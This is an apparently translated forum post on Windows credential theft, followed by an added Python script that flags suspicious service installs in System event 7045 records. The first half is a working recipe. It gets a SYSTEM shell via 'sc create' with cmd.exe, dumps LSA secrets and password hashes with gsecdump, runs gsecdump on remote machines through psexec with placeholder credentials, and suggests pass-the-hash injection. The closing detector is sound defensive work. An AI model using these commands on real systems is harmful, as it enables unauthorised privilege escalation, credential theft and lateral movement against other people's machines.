To get a DOS Prompt as NT system:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.

A quick tip: you can use iam from the pshtools toolkit to load the hash information just grabbed with gsecdump into the local lsass process and carry out a hash-injection attack. The foreigners really are good at this; administrators are going to be busy now. The LM/NT hashes obtained during ARP spoofing, and the ones obtained with gethash, actually never need the password cracked at all; this is purely a matter of using the tools. As the original puts it, whether the password is 4 characters or 127, once you have the hash it is 100% done.

Original source: http://truesecurity.se/blogs/mur ... -text-password.aspx

I had a look at the original source; it seems to date from /2007/03/16/. Depressing, what a gap.
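The post obtains a SYSTEM shell by registering cmd.exe as a service with sc create, and PsExec reaches the remote machine by installing its own service. On the defender's side, both leave a service-install record in the System log (event 7045, "A service was installed in the system"), so that record is the natural place to look. The Python below is an added example, not code from this post, from TrueSec or from Sysinternals: it parses constructed sample 7045 bodies and flags services whose image is a command interpreter or whose name matches the service PsExec installs. The sample records, the SHELL_IMAGES set and the function names are the example's own assumptions.

```python
import re

# Constructed sample records (not from the original post), shaped like the message
# body of System event 7045 "A service was installed in the system." The first one
# mirrors the sc create command in the post; the third is a benign control.
SAMPLE_7045_EVENTS = [
    r"""Service Name: shellcmdline
Service File Name: C:\WINDOWS\system32\cmd.exe /K start
Service Type: user mode service
Service Start Type: demand start
Service Account: LocalSystem""",
    r"""Service Name: PSEXESVC
Service File Name: %SystemRoot%\PSEXESVC.exe
Service Type: user mode service
Service Start Type: demand start
Service Account: LocalSystem""",
    r"""Service Name: Spooler
Service File Name: C:\WINDOWS\system32\spoolsv.exe
Service Type: user mode service
Service Start Type: auto start
Service Account: LocalSystem""",
]

# Images that should essentially never be the binary of a freshly installed service
# (assumed watch-list for this example; extend it to suit the environment).
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}

# Service name PsExec registers on the target when it runs a remote command.
KNOWN_REMOTE_EXEC_SERVICES = {"psexesvc"}


def parse_7045(body: str) -> dict[str, str]:
    """Turn a 7045 message body into {lower-cased field name: value}."""
    fields = {}
    for line in body.splitlines():
        if ":" in line:
            key, value = line.split(":", 1)  # first colon ends the field name
            fields[key.strip().lower()] = value.strip()
    return fields


def image_basename(file_name: str) -> str:
    """Extract the executable name from a service file name, ignoring path and arguments."""
    match = re.search(r'([^\s"\\/]+\.exe)', file_name, re.IGNORECASE)
    return match.group(1).lower() if match else ""


def assess_service_install(body: str) -> list[str]:
    """Return a list of findings for one 7045 record; empty means nothing suspicious."""
    fields = parse_7045(body)
    name = fields.get("service name", "")
    image = image_basename(fields.get("service file name", ""))
    account = fields.get("service account", "") or "unknown account"
    findings = []
    if image in SHELL_IMAGES:
        findings.append(
            f"service '{name}' runs a command interpreter ({image}) as {account}"
        )
    if name.lower() in KNOWN_REMOTE_EXEC_SERVICES:
        findings.append(f"service '{name}' matches the PsExec remote-execution service")
    return findings


def scan_service_installs(bodies) -> dict[str, list[str]]:
    """Assess every record and key the findings by service name."""
    return {
        parse_7045(body).get("service name", ""): assess_service_install(body)
        for body in bodies
    }


if __name__ == "__main__":
    for service, findings in scan_service_installs(SAMPLE_7045_EVENTS).items():
        status = "; ".join(findings) if findings else "ok"
        print(f"{service}: {status}")
```

Running it over the constructed records reports shellcmdline (cmd.exe running as LocalSystem) and PSEXESVC, and leaves the Spooler record alone. In a real deployment the bodies would come from the System log rather than the inline list, and the 4697 record in the Security log carries the same information when service-install auditing is enabled.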